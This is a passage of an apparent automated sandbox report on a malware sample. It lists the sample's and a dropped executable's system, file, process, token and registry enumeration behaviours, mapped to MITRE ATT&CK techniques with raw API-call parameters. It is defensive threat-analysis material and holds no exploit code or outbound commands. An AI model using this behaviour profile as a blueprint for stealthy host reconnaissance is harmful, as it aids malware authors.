"attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" queries volume information of \"C:\\\" at 00000000-00005304-0000010C-158347\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00006104-0000010C-303385\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00006044-0000010C-1053733", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006500e8586500e3586500000000000000000000006200000000019cdd22000000000000eb220095e1b87709b35100feffffff435cbc775059bc77aa000000b8000000e2586500e058650024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5cbb7760d8cf75ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096edbc770a596500a06a92758600000024df22005ce322000000000086008800a06a927524df2200916c92750a596500a06a9275a06a927594e3220002020000 (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005304)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000f01d6800eb1d6800000000000000000000006500000000019cdc22000000000000ea220095e1b8771eb75100feffffff435cbc775059bc77aa000000b8000000ea1d6800e81d680024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5cbb7760d8cf75ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096edbc77121e6800a06a92758600000024de22005ce222000000000086008800a06a927524de2200916c9275121e6800a06a9275a06a927594e2220002020000 (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf00bd77d600bd778250cf7770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00006104)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006104)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-430", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system network configuration", "description": "Found string \"tracert6.exe\" (Indicator: \"tracert\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found string \"nslookup.exe\" (Indicator: \"nslookup\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found string \"tracert.exe\" (Indicator: \"tracert\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n file/memory contains long string with (Indicator: \"nslookup\"; File: \"085cda53603755dc.exe\")\n file/memory contains long string with (Indicator: \"tracert\"; File: \"085cda53603755dc.exe\")\n Found string \"tracert6.exe\" (Indicator: \"tracert\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found string \"nslookup.exe\" (Indicator: \"nslookup\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")\n Found string \"tracert.exe\" (Indicator: \"tracert\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-688", "type": 2, "relevance": 1, "name": "Able to find string content in a file", "description": "Found string \"findstr.exe\" (File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found string \"findstr.exe\" (Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006104)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetTempPathW\" (Indicator: \"GetTempPath\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetTempPathW\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetTempPathW\" (Indicator: \"GetTempPath\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"GetTempPathW\" (Indicator: \"GetTempPath\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegOpenKeyExW\" (Indicator: \"RegOpenKey\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"RegOpenKeyExW\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"RegOpenKeyExW\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"RegOpenKeyExW\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-437", "type": 2, "relevance": 1, "name": "Contains ability to retrieve token privileges information (API string)", "description": "Found reference to API \"CheckTokenMembership\" (Indicator: \"CheckTokenMembership\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"CheckTokenMembership\" (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"CheckTokenMembership\" (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"CheckTokenMembership\" (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00005304)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindNextFileW\" (Indicator: \"FindNextFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"FindFirstFileW\" (Indicator: \"FindFirstFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"FindFirstFileW\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"FindNextFileW\" (Indicator: \"FindNextFile\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"FindFirstFileW\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"FindNextFileW\" (Indicator: \"FindNextFile\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"FindFirstFileW\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"FindNextFileW\" (Indicator: \"FindNextFile\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \"11186540125,5896,3025,,RtlGetNtProductType,NTDLL.dll,\"252:30:35.172\",RX=0,PX=0\" (Indicator: \"RtlGetNtProductType\"; Source: \"00000000-00006104.00000000.173155.00650000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API 